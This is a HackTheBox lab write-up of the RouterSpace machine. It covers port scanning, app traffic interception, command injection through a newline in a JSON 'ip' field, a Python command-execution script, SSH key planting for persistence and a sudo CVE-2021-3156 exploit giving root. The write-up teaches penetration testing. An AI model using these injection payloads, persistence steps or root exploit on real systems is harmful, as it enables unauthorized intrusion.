HTB Writeup: RouterSpace

Tech will overtake the world… Just after solving that captcha real quick.

Mayank Malik
Jul 9, 2022 4 min read

Enumeration

NMAP Scan

# Nmap 7.92 scan initiated Sun Apr 10 19:53:33 2022 as: nmap -sC -sV -T3 -oN nmap.all-port.txt -vv -p- 10.10.11.148
Nmap scan report for 10.10.11.148 (10.10.11.148)
Host is up, received echo-reply ttl 63 (0.078s latency).
Scanned at 2022-04-10 19:53:39 IST for 138s
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTJG10LrPb/oV0/FaR2FprNXTVtRobg1Jwy5UOJGrzjWqI8lNDf5DDi3ilSdkJZ0+0Rwr4/gKG5UlyvqCz07XrPfnWG+E7NrgpMpVKR4LF9fbX750gxK+hOSco3qQclv3CUTjTzwMgxf0ltyOg6WJvThYQ3CFDDeOc4T27YqQ/VgwBT92PWu6aZgWX2oAn+X8/fdcejGWeumU9b+rufiNt/pQ1dGUz+wkHeb2pIaA4WfEQLHB1xF33rTZuAXFDiKSb35EpPvhuShsMPQv6Q+NfLAiENgdy+UdybSNH6k1gmPHyroSYoXth7Pelpg+38V9SYtvvoxQRqBbaLApEClTnIM/IvQba9vY8VdfKYDGDcgeuPm8ksnOFPrb5L6axwl0K2ngE4VHQBJM0yxIRo5dELswD1c9O1tR2rq6MbW2giPl6dx/xzEbdVV6VO5n/prjsnpEs8YvNmnELrt6mt0FkcJQ9ageN5ji3pecKxKTVY4J71yf4+cVZKwpX8xI5H6E=
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDiksdoNGb5HSVU5I64JPbS+qDrMnHaxiFkU+JKFH9VnP69mvgdIM9wTDl/WGjeWV2AJsl7NLQQ4W0goFL/Kz48=
|   256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP2psOHQ+E45S1f8MOulwczO6MLHRMr+DYtiyNM0SJw8
80/tcp open  http    syn-ack ttl 63
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 017FE5BB3BCC0B9C531C0B9402C701FC
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-49027
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 71
|     ETag: W/"47-T64tMSKD7uSVSzvAfvdqZJPKFTg"
|     Date: Sun, 10 Apr 2022 14:25:47 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: 90tTo XoP n klD 5 TZ }
|   GetRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-50696
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Sun, 10 Apr 2022 14:25:46 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-32396
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Sun, 10 Apr 2022 14:25:46 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe:
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: RouterSpace
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=4/10%Time=6252E8E8%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-RouterSpace\x20Packet\x20Filtering\x20V1\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.92%I=7%D=4/10%Time=6252E8E9%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,13E4,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\n
SF:X-Cdn:\x20RouterSpace-50696\r\nAccept-Ranges:\x20bytes\r\nCache-Control
SF::\x20public,\x20max-age=0\r\nLast-Modified:\x20Mon,\x2022\x20Nov\x20202
SF:1\x2011:33:57\x20GMT\r\nETag:\x20W/\"652c-17d476c9285\"\r\nContent-Type
SF::\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2025900\r\nDate:\x
SF:20Sun,\x2010\x20Apr\x202022\x2014:25:46\x20GMT\r\nConnection:\x20close\
SF:r\n\r\n<!doctype\x20html>\n<html\x20class=\"no-js\"\x20lang=\"zxx\">\n<
SF:head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<me
SF:ta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x20\
SF:x20\x20<title>RouterSpace</title>\n\x20\x20\x20\x20<meta\x20name=\"desc
SF:ription\"\x20content=\"\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\
SF:x20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.min\.css\">\n\x
SF:20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/owl\.carousel\.
SF:min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/
SF:magnific-popup\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"css/font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"st
SF:ylesheet\"\x20href=\"css/themify-icons\.css\">\n\x20")%r(HTTPOptions,10
SF:8,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX-Cdn:\x20
SF:RouterSpace-32396\r\nAllow:\x20GET,HEAD,POST\r\nContent-Type:\x20text/h
SF:tml;\x20charset=utf-8\r\nContent-Length:\x2013\r\nETag:\x20W/\"d-bMedpZ
SF:YGrVt1nR4x\+qdNZ2GqyRo\"\r\nDate:\x20Sun,\x2010\x20Apr\x202022\x2014:25
SF::46\x20GMT\r\nConnection:\x20close\r\n\r\nGET,HEAD,POST")%r(RTSPRequest
SF:,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n
SF:")%r(X11Probe,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20
SF:close\r\n\r\n")%r(FourOhFourRequest,12D,"HTTP/1\.1\x20200\x20OK\r\nX-Po
SF:wered-By:\x20RouterSpace\r\nX-Cdn:\x20RouterSpace-49027\r\nContent-Type
SF::\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2071\r\nETag:\x20W
SF:/\"47-T64tMSKD7uSVSzvAfvdqZJPKFTg\"\r\nDate:\x20Sun,\x2010\x20Apr\x2020
SF:22\x2014:25:47\x20GMT\r\nConnection:\x20close\r\n\r\nSuspicious\x20acti
SF:vity\x20detected\x20!!!\x20{RequestID:\x2090tTo\x20\x20XoP\x20n\x20klD\
SF:x205\x20TZ\x20}\n\n\n");

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 10 19:55:57 2022 -- 1 IP address (1 host up) scanned in 143.62 seconds

Important Findings:

  • Web Server at TCP/80
  • SSH Server at TCP/22

User Access

  1. Website visited at TCP/80
  2. An android app was provided on the website named RouterSpace.apk

    1. Static Analysis

      A static analysis was performed using MobSF, no interesting data found.

    2. Dynamic Analysis

      1. The app was loaded onto an Android Emulator with Android API 23 and traffic was intercepted using BurpSuite.

      2. A HTTP Request to the website routerspace.htb was captured. (To make it work, manual entry of domain resolution to HTB IP was appended to /etc/hosts of the Android Virtual Device )

      3. Request

        POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 16
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate
           
{"ip":"0.0.0.0"}

      iv. Response

      HTTP/1.1 200 OK
X-Powered-By: RouterSpace
X-Cdn: RouterSpace-13489
Content-Type: application/json; charset=utf-8
Content-Length: 11
ETag: W/"b-ANdgA/PInoUrpfEatjy5cxfJOCY"
Date: Mon, 11 Apr 2022 00:28:24 GMT
Connection: close
       
"0.0.0.0\n"

      v. The web server running was vulnerable to Command Execution by adding command in ip key of the JSON request

      POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 13
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate
       
{"ip":"\nid"}
       
HTTP/1.1 200 OK
X-Powered-By: RouterSpace
X-Cdn: RouterSpace-99707
Content-Type: application/json; charset=utf-8
Content-Length: 53
ETag: W/"35-ERWpoCDHm08FgkJsyQjiOS48qOc"
Date: Mon, 11 Apr 2022 09:07:18 GMT
Connection: close
       
"\nuid=1001(paul) gid=1001(paul) groups=1001(paul)\n"

      vi. A python script was created to run commands and parse output

      #!/usr/bin/env python3
import requests
import json
import sys
       
headers = {"Content-Type" : "application/json", "User-Agent":"RouterSpaceAgent"}
url = "http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess"
       
def start_rev_shell(command):
    body = {"ip":f"\n{command}"}
    resp = requests.post(url, headers=headers, data=json.dumps(body))
    print(json.loads(resp.text))
       
if __name__ == "__main__":
    start_rev_shell(sys.argv[1])

      vii. SSH Key was added to User’s authorized_keys file in order to get a shell access and persistence

      ./remote_shell.py "echo -n $(cat ./routerspace-paul.pub) > /home/paul/.ssh/authorized_keys"
ssh -i ./routerspace-paul paul@10.10.11.148
Last login: Mon Apr 11 07:57:18 2022 from 10.10.14.124
paul@routerspace:~$

Privilege Escalation

  1. Enumeration was done using linPEASS

       
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31
   
╔══════════╣ CVEs Check
   
[+] [CVE-2021-3156] sudo Baron Samedit
   
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

  2. The remote target is vulnerable to CVE-2021-3156

  3. Exploit available on https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_nss.py was downloaded, uploaded on the target and executed to obtain a shell with id=0 (root privileges)

    ➜ mostwanted002@Loki RouterSpace scp -i ./routerspace-paul ./exploit_nss.py paul@10.10.11.148:/tmp/exploit.py
exploit_nss.py
   
paul@routerspace:~$ python3 /tmp/exploit.py
# id
uid=0(root) gid=0(root) groups=0(root),1001(paul)
# cat /root/root.txt
9b6cae1c5e9ecf5326deb28ef79543ef
#

The remote target is now completely compromised.

Writeup InformationSecurity CyberSecurity Exploit CVE-2021-3156 Wildcard Exploitation Linux HackTheBox RCE via API
Avatar
Mayank Malik
ISC2 CC | CRTP | Incident Response | Synack Red Team Member | Threat and Malware Analyst | Security Researcher

I am a tech-savvy person, Red Team Enthusiast, and like to wander around to learn new stuff. Malware Analysis, Cryptography, Networking, and System Administration are some of my forte. One of the Founding Members of CTF Team, Abs0lut3Pwn4g3. Apart from the mentioned skills, I’m good at communication skills and am a goal-driven person. Yellow belt holder at pwn.college in pursuit of learning and achieving Blue Belt.

Related